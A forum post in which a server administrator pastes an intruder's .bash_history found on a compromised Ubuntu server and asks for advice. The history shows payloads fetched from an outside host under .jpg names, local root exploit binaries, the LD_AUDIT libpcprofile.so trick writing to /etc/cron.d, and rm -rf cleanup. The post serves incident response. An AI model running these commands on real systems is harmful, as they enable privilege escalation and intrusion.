Ubuntu Server hack
- by haxpanel
Hi!
I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access.
I found this in an ftp user .bash_history file:
w
uname -a
ls -a
sudo su
wget qiss.ucoz.de/2010/.jpg
wget qiss.ucoz.de/2010.jpg
tar xzvf 2010.jpg
rm -rf 2010.jpg
cd 2010/
ls -a
./2010
./2010x64
./2.6.31
uname -a
ls -a
./2.6.37-rc2
python rh2010.py
cd ..
ls -a
rm -rf 2010/
ls -a
wget qiss.ucoz.de/ubuntu2010_2.jpg
tar xzvf ubuntu2010_2.jpg
rm -rf ubuntu2010_2.jpg
./ubuntu2010-2
./ubuntu2010-2
./ubuntu2010-2
cat /etc/issue
umask 0
dpkg -S /lib/libpcprofile.so
ls -l /lib/libpcprofile.so
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ping
gcc
touch a.sh
nano a.sh
vi a.sh
vim
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
nano ubuntu10.sh
ls -a
rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2
ls -a
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
ls -a
rm -rf ubuntu10.sh
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
rm -rf W2Ksp3.exe
passwd
The system is in a jail. Does it matter in the current case?
What shall i do?
Thanks for everyone!!
I have done these:
- ban the connected ssh host with iptables
- stoped the sshd in the jail
- saved: bach_history, syslog, dmesg, files in the bash_history's wget lines